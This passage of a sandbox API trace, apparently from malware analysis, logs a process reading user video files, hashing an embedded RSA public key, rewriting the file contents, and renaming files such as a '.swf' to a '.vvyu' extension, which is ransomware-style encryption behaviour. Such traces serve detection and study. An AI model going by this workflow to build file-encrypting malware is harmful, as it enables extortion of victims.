[0202.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0202.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0202.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0202.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa80 [0202.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0202.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0202.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0202.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3650 [0202.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0202.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0202.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0202.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0202.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0202.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0202.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0202.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0202.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea35f0 [0202.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0202.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0202.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0202.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0202.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0202.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0202.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0202.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3608 [0202.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0202.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85ac8 [0202.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0202.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea35d8 [0202.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0202.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3668 [0202.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0202.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0202.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0202.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3638 [0202.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0202.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3620 [0202.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0202.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3680 [0202.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3620 | out: hHeap=0x620000) returned 1 [0202.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3620 [0202.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3638 | out: hHeap=0x620000) returned 1 [0202.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0202.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0202.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0202.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0202.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83750 [0202.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea35f0 | out: hHeap=0x620000) returned 1 [0202.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea35f0 [0202.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0202.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0202.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3650 | out: hHeap=0x620000) returned 1 [0202.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0202.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3680 | out: hHeap=0x620000) returned 1 [0202.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0202.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0202.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99c10 [0202.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0202.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0202.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea35f0 | out: hHeap=0x620000) returned 1 [0202.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0202.245] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0202.245] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e960b0 [0202.245] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0202.246] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.247] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0202.247] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e960b0 | out: hHeap=0x620000) returned 1 [0202.247] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0202.247] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0202.248] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0202.248] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0202.248] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0202.248] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0202.248] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3620 | out: hHeap=0x620000) returned 1 [0202.248] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0202.249] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3668 | out: hHeap=0x620000) returned 1 [0202.249] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0202.249] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3608 | out: hHeap=0x620000) returned 1 [0202.249] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea35d8 | out: hHeap=0x620000) returned 1 [0202.249] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0202.249] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0202.249] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0202.250] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea35c0 | out: hHeap=0x620000) returned 1 [0202.250] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e90230 | out: hHeap=0x620000) returned 1 [0202.250] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0202.250] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0202.251] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0202.258] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0202.258] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0202.258] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0202.258] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0202.258] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0202.258] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0202.259] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0202.259] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0202.259] WriteFile (in: hFile=0x510, lpBuffer=0x2ea99b0*, nNumberOfBytesToWrite=0xaaa0, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea99b0*, lpNumberOfBytesWritten=0x312fb14*=0xaaa0, lpOverlapped=0x0) returned 1 [0202.260] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea99b0 | out: hHeap=0x620000) returned 1 [0202.260] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0xaaa5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0202.260] WriteFile (in: hFile=0x510, lpBuffer=0x2e95ea0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95ea0*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0202.260] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0202.260] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.261] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0202.261] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0202.261] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0202.261] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0202.261] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.261] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0202.262] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0202.262] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0202.262] WriteFile (in: hFile=0x510, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0202.262] CloseHandle (hObject=0x510) returned 1 [0202.265] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0202.265] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x890) returned 0x2ea6a68 [0202.265] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0202.265] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\vtiS4AAZ_oK\\B8Gbt7KNns9kT-gvh.swf" (normalized: "c:\\users\\keecfmwgj\\videos\\z2e0zt\\vtis4aaz_ok\\b8gbt7knns9kt-gvh.swf"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\vtiS4AAZ_oK\\B8Gbt7KNns9kT-gvh.swf.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\z2e0zt\\vtis4aaz_ok\\b8gbt7knns9kt-gvh.swf.vvyu")) returned 1 [0202.267] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0202.269] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0202.269] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0202.272] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91678 | out: hHeap=0x620000) returned 1 [0202.272] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9f5efa0, ftCreationTime.dwHighDateTime=0x1d89947, ftLastAccessTime.dwLowDateTime=0xec7cbde0, ftLastAccessTime.dwHighDateTime=0x1d8a72b, ftLastWriteTime.dwLowDateTime=0xec7cbde0, ftLastWriteTime.dwHighDateTime=0x1d8a72b, nFileSizeHigh=0x0, nFileSizeLow=0x9d05, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cPfFJ9.flv", cAlternateFileName="")) returned 1 [0202.272] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.272] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8e) returned 0x2e91678 [0202.272] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.272] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\vtiS4AAZ_oK\\cPfFJ9.flv") returned=".flv" [0202.273] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\vtiS4AAZ_oK\\cPfFJ9.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\z2e0zt\\vtis4aaz_ok\\cpffj9.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0202.273] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=40197) returned 1 [0202.273] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0202.276] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x9cdf, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0202.276] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0202.279] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83750 [0202.280] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0202.280] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0202.280] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x9d05, lpOverlapped=0x0) returned 1 [0202.283] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0202.283] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2d0c3c8 [0202.283] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0202.283] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0202.283] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c300) returned 1 [0202.284] CryptCreateHash (in: hProv=0x67c300, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0202.284] CryptHashData (hHash=0x2cfe1c0, pbData=0x2d0c3c8, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0202.284] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0202.284] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0202.284] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0202.284] GetLastError () returned 0x0 [0202.284] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83750 [0202.284] GetLastError () returned 0x0 [0202.284] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0202.285] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0202.285] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0202.285] CryptDestroyHash (hHash=0x2cfe1c0) returned 1 [0202.285] CryptReleaseContext (hProv=0x67c300, dwFlags=0x0) returned 1 [0202.285] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0202.285] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0202.285] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0202.285] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0202.285] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0202.286] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0202.286] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0202.286] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9d10) returned 0x2ea99b0 [0202.286] SetFilePointer (in: hFile=0x510, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0202.287] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0202.287] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0202.287] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0202.287] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0c3c8 [0202.287] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0202.287] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e90230 [0202.287] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea35c0 [0202.287] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1a80 [0202.287] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea35d8 [0202.287] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3608 [0202.287] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3668 [0202.287] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3620 [0202.287] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0202.287] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0202.287] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0202.287] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0202.287] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3608 | out: hHeap=0x620000) returned 1 [0202.287] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3620 | out: hHeap=0x620000) returned 1 [0202.287] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3668 | out: hHeap=0x620000) returned 1 [0202.288] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0202.288] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0202.288] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3668 [0202.288] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0202.288] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3620 [0202.288] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0202.288] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea3608 [0202.289] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a50 [0202.289] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c998c8 [0202.289] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83750 [0202.289] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0202.289] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0202.289] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99c10 [0202.289] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85ac8 [0202.289] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0202.289] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0202.289] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3620 | out: hHeap=0x620000) returned 1 [0202.289] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0202.289] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3608 | out: hHeap=0x620000) returned 1 [0202.289] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0202.289] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0202.289] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3668 | out: hHeap=0x620000) returned 1 [0202.290] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0202.290] 